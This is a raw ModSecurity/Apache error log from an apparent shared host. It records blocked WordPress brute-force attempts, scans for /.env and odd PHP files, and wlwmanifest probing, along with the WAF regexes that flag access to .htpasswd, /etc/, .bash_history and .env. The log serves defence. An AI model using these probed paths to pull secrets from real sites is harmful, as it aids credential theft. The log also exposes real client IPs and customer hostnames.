[Tue May 26 15:55:07.059987 2026] [security2:error] [pid 745492:tid 745670] [client 103.153.130.62:60101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1AomEQglTmoWcfxKMFQAAALI"]
[Tue May 26 15:55:07.060142 2026] [security2:error] [pid 745492:tid 745670] [client 103.153.130.62:60101] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1AomEQglTmoWcfxKMFQAAALI"]
[Tue May 26 15:55:07.614950 2026] [security2:error] [pid 745492:tid 745656] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1A4mEQglTmoWcfxKMGwAAAKQ"]
[Tue May 26 15:55:07.933841 2026] [security2:error] [pid 745492:tid 745738] [client 223.123.35.44:36262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1A4mEQglTmoWcfxKMOQAAAPY"]
[Tue May 26 15:55:07.933947 2026] [security2:error] [pid 745492:tid 745738] [client 223.123.35.44:36262] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1A4mEQglTmoWcfxKMOQAAAPY"]
[Tue May 26 15:55:08.108763 2026] [security2:error] [pid 745492:tid 745631] [client 103.44.52.196:52422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1BImEQglTmoWcfxKMPgAAAIs"]
[Tue May 26 15:55:08.108865 2026] [security2:error] [pid 745492:tid 745631] [client 103.44.52.196:52422] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1BImEQglTmoWcfxKMPgAAAIs"]
[Tue May 26 15:55:09.349016 2026] [security2:error] [pid 745492:tid 745680] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1BImEQglTmoWcfxKMUAAAALw"]
[Tue May 26 15:55:09.737901 2026] [security2:error] [pid 747840:tid 747998] [client 114.119.156.126:26127] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV1BYm6MwAuYuZKxvkFiQAAASY"], referer: http://haddingtonwines.com/cart?remove_item=989652eef28bc49eec908063ba36a854
[Tue May 26 15:55:10.689332 2026] [security2:error] [pid 745492:tid 745666] [client 85.208.96.207:29852] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahV1BomEQglTmoWcfxKMawAAAK4"]
[Tue May 26 15:55:10.689513 2026] [security2:error] [pid 745492:tid 745666] [client 85.208.96.207:29852] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahV1BomEQglTmoWcfxKMawAAAK4"]
[Tue May 26 15:55:11.547124 2026] [security2:error] [pid 747840:tid 747977] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1B4m6MwAuYuZKxvkFngAAARE"]
[Tue May 26 15:55:13.117355 2026] [security2:error] [pid 747840:tid 748045] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1CIm6MwAuYuZKxvkFuwAAAVU"]
[Tue May 26 15:55:13.135535 2026] [security2:error] [pid 747840:tid 747972] [client 167.160.77.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1CYm6MwAuYuZKxvkFwgAAAQw"], referer: https://www.anujtradingco.com/
[Tue May 26 15:55:13.639584 2026] [security2:error] [pid 745492:tid 745714] [client 143.110.243.118:47284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/lx.php"] [unique_id "ahV1CYmEQglTmoWcfxKMjwAAAN4"]
[Tue May 26 15:55:13.908468 2026] [security2:error] [pid 747840:tid 748043] [client 106.219.85.83:3505] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1CYm6MwAuYuZKxvkFyQAAAVM"]
[Tue May 26 15:55:13.909331 2026] [security2:error] [pid 747840:tid 748043] [client 106.219.85.83:3505] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1CYm6MwAuYuZKxvkFyQAAAVM"]
[Tue May 26 15:55:13.921307 2026] [security2:error] [pid 745492:tid 745701] [client 74.7.230.40:59522] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.mrgtp.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahV1CYmEQglTmoWcfxKMkgAA0Xg"]
[Tue May 26 15:55:13.958214 2026] [security2:error] [pid 745492:tid 745732] [client 223.123.35.44:36263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1CYmEQglTmoWcfxKMlAAAAPA"]
[Tue May 26 15:55:13.958405 2026] [security2:error] [pid 745492:tid 745732] [client 223.123.35.44:36263] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1CYmEQglTmoWcfxKMlAAAAPA"]
[Tue May 26 15:55:14.279497 2026] [security2:error] [pid 745492:tid 745699] [client 172.225.181.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahV1ComEQglTmoWcfxKMlwAAAM8"]
[Tue May 26 15:55:14.411594 2026] [security2:error] [pid 747840:tid 748072] [client 167.160.77.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1Com6MwAuYuZKxvkF0AAAAXA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 15:55:15.071641 2026] [security2:error] [pid 747840:tid 748011] [client 176.65.139.229:62866] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env"] [unique_id "ahV1C4m6MwAuYuZKxvkF2wAAATM"]
[Tue May 26 15:55:15.534979 2026] [security2:error] [pid 747840:tid 747994] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1C4m6MwAuYuZKxvkF3gAAASI"]
[Tue May 26 15:55:17.302164 2026] [security2:error] [pid 747840:tid 747972] [client 103.153.130.62:60427] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1DYm6MwAuYuZKxvkGBAAAAQw"]
[Tue May 26 15:55:17.302286 2026] [security2:error] [pid 747840:tid 747972] [client 103.153.130.62:60427] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1DYm6MwAuYuZKxvkGBAAAAQw"]
[Tue May 26 15:55:17.634653 2026] [security2:error] [pid 747840:tid 748036] [client 167.160.77.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1DYm6MwAuYuZKxvkGCAAAAUw"], referer: https://anujtradingco.com
[Tue May 26 15:55:17.701070 2026] [security2:error] [pid 745492:tid 745655] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1DYmEQglTmoWcfxKMtQAAAKM"]
[Tue May 26 15:55:18.198421 2026] [security2:error] [pid 747840:tid 747841] [remote 165.22.95.96:45408] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahV1DYm6MwAuYuZKxvkGDwABdAA"]
[Tue May 26 15:55:18.590820 2026] [security2:error] [pid 747840:tid 748057] [client 103.44.52.196:55978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1Dom6MwAuYuZKxvkGHwAAAWE"]
[Tue May 26 15:55:18.590948 2026] [security2:error] [pid 747840:tid 748057] [client 103.44.52.196:55978] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1Dom6MwAuYuZKxvkGHwAAAWE"]
[Tue May 26 15:55:19.151824 2026] [security2:error] [pid 747840:tid 748024] [client 89.105.15.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1Dom6MwAuYuZKxvkGKwAAAUA"]
[Tue May 26 15:55:19.701530 2026] [security2:error] [pid 745492:tid 745651] [client 176.65.139.237:17612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.unsobered.moes-art.com"] [uri "/.env"] [unique_id "ahV1D4mEQglTmoWcfxKM3gAAAJ8"]
[Tue May 26 15:55:20.085007 2026] [security2:error] [pid 745492:tid 745648] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1D4mEQglTmoWcfxKM3QAAAJw"]
[Tue May 26 15:55:20.112903 2026] [autoindex:error] [pid 745492:tid 745736] [client 223.228.15.236:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 15:55:20.216680 2026] [security2:error] [pid 747840:tid 748011] [client 223.228.15.236:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahV1EIm6MwAuYuZKxvkGbQAAATM"], referer: https://www.ucdc.co.in/
[Tue May 26 15:55:20.909486 2026] [autoindex:error] [pid 747840:tid 748010] [client 223.228.15.236:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 15:55:21.219724 2026] [security2:error] [pid 747840:tid 748012] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1EIm6MwAuYuZKxvkGeAAAATQ"]
[Tue May 26 15:55:22.349201 2026] [security2:error] [pid 747840:tid 748025] [client 34.7.101.65:44948] ModSecurity: Warning. Pattern match "^\\\\/$" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1450"] [id "9011111"] [msg "SQUID data collection"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahV1Eom6MwAuYuZKxvkGlgAAAUE"]
[Tue May 26 15:55:22.354028 2026] [security2:error] [pid 745492:tid 745688] [client 34.7.101.65:0] ModSecurity: Warning. Pattern match "^\\\\/$" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1450"] [id "9011111"] [msg "SQUID data collection"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahV1EomEQglTmoWcfxKNCAAAAMQ"]
[Tue May 26 15:55:22.434048 2026] [security2:error] [pid 745492:tid 745681] [client 74.7.244.59:48174] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "tufello.net"] [uri "/robots.txt"] [unique_id "ahV1EomEQglTmoWcfxKNDQAAvX4"]
[Tue May 26 15:55:22.497186 2026] [security2:error] [pid 745492:tid 745701] [client 74.7.175.170:46872] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "tufello.net.eurodomini.com"] [uri "/robots.txt"] [unique_id "ahV1EomEQglTmoWcfxKNDwAA0Rs"]
[Tue May 26 15:55:22.511557 2026] [security2:error] [pid 745492:tid 745732] [client 74.7.244.59:48174] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "tufello.net"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "ahV1EomEQglTmoWcfxKNDgAA8B8"], referer: https://tufello.net/robots.txt
[Tue May 26 15:55:22.577657 2026] [security2:error] [pid 745492:tid 745653] [client 74.7.175.170:46872] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "tufello.net.eurodomini.com"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "ahV1EomEQglTmoWcfxKNEAAAoRw"], referer: https://tufello.net.eurodomini.com/robots.txt
[Tue May 26 15:55:23.217014 2026] [autoindex:error] [pid 745492:tid 745646] [client 34.23.113.84:52904] AH01276: Cannot serve directory /home1/micro3e1/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:55:23.324262 2026] [security2:error] [pid 745492:tid 745710] [client 143.110.243.118:34022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/tonant.php"] [unique_id "ahV1E4mEQglTmoWcfxKNJgAAANo"]
[Tue May 26 15:55:23.624043 2026] [security2:error] [pid 745492:tid 745729] [client 34.23.113.84:52904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.113.23.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "microlampworks.com"] [uri "/xmlrpc.php"] [unique_id "ahV1E4mEQglTmoWcfxKNKAAAAO0"]
[Tue May 26 15:55:23.897103 2026] [security2:error] [pid 747840:tid 748014] [client 34.23.113.84:63021] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "microlampworks.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahV1E4m6MwAuYuZKxvkGrAAAATY"]
[Tue May 26 15:55:23.973531 2026] [security2:error] [pid 745492:tid 745687] [client 138.229.111.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1E4mEQglTmoWcfxKNOgAAAMM"], referer: https://www.anujtradingco.com/
[Tue May 26 15:55:23.980582 2026] [security2:error] [pid 747840:tid 748017] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1E4m6MwAuYuZKxvkGpAAAATk"]
[Tue May 26 15:55:24.314687 2026] [security2:error] [pid 745492:tid 745667] [client 34.23.113.84:62689] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "microlampworks.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahV1FImEQglTmoWcfxKNPwAAAK8"]
[Tue May 26 15:55:24.568552 2026] [security2:error] [pid 747840:tid 748022] [client 74.7.228.51:45836] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.blackboxalgo.in.jiyani.in"] [uri "/cgi-sys/404.html"] [unique_id "ahV1FIm6MwAuYuZKxvkGtwABPh8"]
[Tue May 26 15:55:24.781119 2026] [security2:error] [pid 745492:tid 745700] [client 106.219.85.83:3602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1FImEQglTmoWcfxKNSQAAANA"]
[Tue May 26 15:55:24.781283 2026] [security2:error] [pid 745492:tid 745700] [client 106.219.85.83:3602] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1FImEQglTmoWcfxKNSQAAANA"]
[Tue May 26 15:55:24.906079 2026] [security2:error] [pid 745492:tid 745732] [client 34.23.113.84:55100] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "microlampworks.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahV1FImEQglTmoWcfxKNUwAAAPA"]
[Tue May 26 15:55:25.248912 2026] [security2:error] [pid 745492:tid 745683] [client 138.229.111.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1FYmEQglTmoWcfxKNWAAAAL8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1451724&moderation-hash=c10d94684c11aa1f3585d7068d7348eb
[Tue May 26 15:55:25.382536 2026] [security2:error] [pid 747840:tid 748032] [client 34.23.113.84:59796] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "microlampworks.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahV1FYm6MwAuYuZKxvkGwQAAAUg"]
[Tue May 26 15:55:25.776811 2026] [security2:error] [pid 745492:tid 745651] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1FYmEQglTmoWcfxKNYAAAAJ8"]
[Tue May 26 15:55:25.827218 2026] [security2:error] [pid 745492:tid 745717] [client 34.23.113.84:57994] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "microlampworks.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahV1FYmEQglTmoWcfxKNZQAAAOE"]
[Tue May 26 15:55:26.159349 2026] [security2:error] [pid 745492:tid 745748] [client 34.23.113.84:57592] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "microlampworks.com"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahV1FomEQglTmoWcfxKNZwAAAQA"]
[Tue May 26 15:55:26.406007 2026] [security2:error] [pid 745492:tid 745657] [client 34.23.113.84:59053] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "microlampworks.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahV1FomEQglTmoWcfxKNawAAAKU"]
[Tue May 26 15:55:26.670604 2026] [security2:error] [pid 745492:tid 745687] [client 34.23.113.84:63960] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "microlampworks.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahV1FomEQglTmoWcfxKNbgAAAMM"]
